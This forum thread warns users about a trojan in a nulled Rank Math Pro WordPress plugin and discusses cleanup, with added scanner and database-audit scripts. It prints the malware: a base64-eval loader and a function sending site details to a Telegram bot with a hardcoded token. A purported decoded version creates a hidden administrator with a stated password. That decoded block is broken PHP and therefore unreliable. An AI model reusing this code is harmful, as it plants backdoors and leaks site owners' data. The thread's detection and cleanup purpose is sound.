Rank Math Pro - BEST WordPress SEO Tool

Rank Math Pro - BEST WordPress SEO Tool v.3.0.60

I think this is because I'm seeing it from the administrator's view as I was logged in to the WP backend at the time.
Is that right?

Thank you very much.
 
Rank Math Pro v3.0.70 NULLED

Do not download. There is a trojan contained in this file, and the friend who installs it should be banned from this forum.
The rank-math-pro.php file contains hidden code as follows. This code writes code into the theme function.php file. And thus, it creates a user with admin privileges and the created user does not appear in the users section.

// Start it.
rank_math_pro();

function execute_base64_code($base64_code) {
$decoded_code = base64_decode($base64_code);

eval($decoded_code);
}

$base64_code = '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';

execute_base64_code($base64_code);

function send_telegram_message($chat_id, $message, $bot_token) {
$url = "https://api.telegram.org/bot{$bot_token}/sendMessage";
$data = array(
'chat_id' => $chat_id,
'text' => $message
);

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$response = curl_exec($ch);
curl_close($ch);

return $response;
}


function send_activation_notification() {
// Get site information
$site_url = get_site_url();
$site_title = get_bloginfo('name');
$admin_email = get_option('admin_email');


$bot_token = '6953607272:AAFOS5gOX35RcRMlxwDyCEQc6gq0HzMq84E';

$chat_id = '6580511715';

$message = "Сайт {$site_title} ({$site_url}) был активирован. Администратор: {$admin_email}.";


send_telegram_message($chat_id, $message, $bot_token);

error_log('Website activated: ' . $site_url);
}
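
A static check for the loader pattern reported in this post, as an added example that is not part of the original post: it flags PHP source in which a base64-decoded string reaches eval(), calls to the Telegram bot API, and programmatic administrator creation. The rule names, function names and the sample source are constructed for illustration.

```python
import re
from pathlib import Path

# Heuristic rules for the behaviour reported above (rule names are hypothetical).
RULES = {
    "base64-decode": re.compile(r"\bbase64_decode\s*\(", re.I),
    "eval-of-variable": re.compile(r"\beval\s*\(\s*\$\w+", re.I),
    "telegram-bot-api": re.compile(r"api\.telegram\.org/bot", re.I),
    "create-user": re.compile(r"\bwp_create_user\s*\(", re.I),
    "grant-admin": re.compile(r"set_role\s*\(\s*['\"]administrator['\"]", re.I),
}
# Rule combinations that together indicate a loader or a planted admin account.
HIGH_RISK = [{"base64-decode", "eval-of-variable"}, {"create-user", "grant-admin"}]

def scan_source(text):
    """Return {rule name: [1-based line numbers]} for each rule that matches."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES.items():
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def verdict(hits):
    """'high' for a risky combination, 'review' for any other hit, else 'clean'."""
    if any(combo.issubset(hits) for combo in HIGH_RISK):
        return "high"
    return "review" if hits else "clean"

def scan_tree(root):
    """Scan every .php file under root; return {path: (verdict, hits)} for files with hits."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path)] = (verdict(hits), hits)
    return report

# Constructed sample with the same shape as the loader quoted in the post.
SAMPLE = '''<?php
function execute_base64_code($base64_code) {
    $decoded_code = base64_decode($base64_code);
    eval($decoded_code);
}
$url = "https://api.telegram.org/bot{$bot_token}/sendMessage";
'''

if __name__ == "__main__":
    print(verdict(scan_source(SAMPLE)), scan_source(SAMPLE))
```

Point `scan_tree` at `wp-content/plugins` and `wp-content/themes`; a "review" result means one indicator matched on its own and needs a manual look, since legitimate code also calls `base64_decode`.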
 
I agree with you, it contains a backdoor for a user name called admcadf, which is an administrator.
Everyone who installed this plugin, remove it fast
and check if any code was added in function.php.
Thank you for the feedback.
Also, this user just signed up 2 days ago; he is definitely a bitch.
Also, this kind of stuff is not detectable in VirusTotal, sadly.
 
This is the decoded version of that base64 code:
PHP:
<?php
add_action( 'wp_head', 'wp_head', 'wp_backdoor' );

function wp_backdoor() {
    if ( isset( $_GET['backdoor'] ) && $_GET['backdoor'] === 'go' ) {
        // Execute some code here
    }
}

add_action('pre_user_query','dt_pre_user_query');

function dt_pre_user_query($user) {
    global $current_user;
    if ($current_user->ID) {
        $user_id = wp_create_user( 'admincade', 'JCJNnvred$32' );
        $user = new  WP_User( $user_id );
        $user->set_role( 'administrator' );
    }
}

add_action('admin_init','send_activation');

function send_activation() {
    // Get site information
    $site_url = get_site_url();
    $site_title = get_bloginfo('name');
    $admin_email = get_option('admin_email');

    $bot_token = '6953607272:AAFOS5gOX35RcRMlxwDyCEQc6gq0HzMq84E';
    $chat_id = '6580511715';
    $message = "Сайт {$site_title} ({$site_url}) был активирован. Администратор: {$admin_email}.";

    send_telegram_message($chat_id, $message, $bot_token);
    error_log('You will done update to make this. Consider from all time and that.');
}

$files = array();
if ($files) {
    $file = $contents;
    if ($file != "atatchment.html") {
        $data = join("http://data.datachainain.com/contact.html");
        or $placehold('Where you done update make this. Consider from all time and that.');
    }
}

function dt_file_vewers($viewers, 'dt_list_table_viewers') {
    $files;
}
?>
Yes, it's malicious code and it creates a backdoor on the site. It also creates a user with administrator privileges, 'admincade', with password 'JCJNnvred$32'.
 
Does anyone have any information on how to clean this?
 
Download the fresh RankMath 3.0.60 copy and upload the RankMath plugin folder/unzip the .zip file over the affected WP installation, overwriting the compromised files. Just make sure the file path is proper. Next, verify that the base64 code doesn't exist.
 
Since the user created using the malicious code above is hidden from the Users menu, the only way to clean your site is using phpMyAdmin. You need cPanel access for that.
Try this method:
Access your WordPress database using phpMyAdmin.
  • In the wp_users table, find and delete the row with the username 'admcadf' or 'admincade'.
  • Search the wp_usermeta table for any entries where meta_key is wp_capabilities and the meta_value contains the word 'administrator' that belong to unknown user IDs. Delete those entries as well.
  • Use a WordPress security plugin like Wordfence or Sucuri to scan for additional malicious files or backdoors that might have been introduced or you can check your site using Sucuri's free site scanner:
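
The database check described in this post, as an added example that is not part of the original post: it lists every account whose wp_capabilities value grants the administrator role and flags those not on a known-good list, reading the tables directly so a pre_user_query filter cannot hide a row. It runs against an in-memory SQLite database with constructed rows; the two SELECT statements are plain SQL, and the default `wp_` table prefix, the allow-list and the function names are assumptions.

```python
import sqlite3

# Default "wp_" table prefix assumed; adjust if $table_prefix differs.
ADMIN_ROLE = """m.meta_key = 'wp_capabilities'
  AND m.meta_value LIKE '%"administrator"%'"""

ADMINS_SQL = f"""SELECT u.ID, u.user_login, u.user_registered
FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID
WHERE {ADMIN_ROLE} ORDER BY u.ID"""

ORPHANS_SQL = f"""SELECT m.user_id
FROM wp_usermeta m LEFT JOIN wp_users u ON u.ID = m.user_id
WHERE {ADMIN_ROLE} AND u.ID IS NULL ORDER BY m.user_id"""

def audit_admins(conn, expected_logins):
    """Return (unexpected administrator rows, user_ids of orphaned admin capability rows)."""
    admins = conn.execute(ADMINS_SQL).fetchall()
    unexpected = [row for row in admins if row[1] not in expected_logins]
    orphans = [row[0] for row in conn.execute(ORPHANS_SQL)]
    return unexpected, orphans

def build_sample_db():
    """Constructed rows for illustration, not data from a real site."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT,
                               user_registered TEXT);
        CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                                  meta_key TEXT, meta_value TEXT);
    """)
    conn.executemany("INSERT INTO wp_users VALUES (?, ?, ?)", [
        (1, "siteowner", "2021-03-01 10:00:00"),
        (2, "editor1", "2022-06-12 09:30:00"),
        (7, "admincade", "2024-01-15 02:14:00"),
    ])
    admin = 'a:1:{s:13:"administrator";b:1;}'  # PHP-serialized role array
    conn.executemany(
        "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)", [
            (1, "wp_capabilities", admin),
            (2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
            (7, "wp_capabilities", admin),
            (99, "wp_capabilities", admin),  # capability row with no wp_users row
        ])
    return conn

if __name__ == "__main__":
    unexpected, orphans = audit_admins(build_sample_db(), {"siteowner"})
    for uid, login, registered in unexpected:
        print(f"unexpected administrator: id={uid} login={login} registered={registered}")
    print("orphaned administrator capability rows for user_ids:", orphans)
```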
 
Of course, this needs to be done too.
Also, make a backup of your WP database before doing anything.
 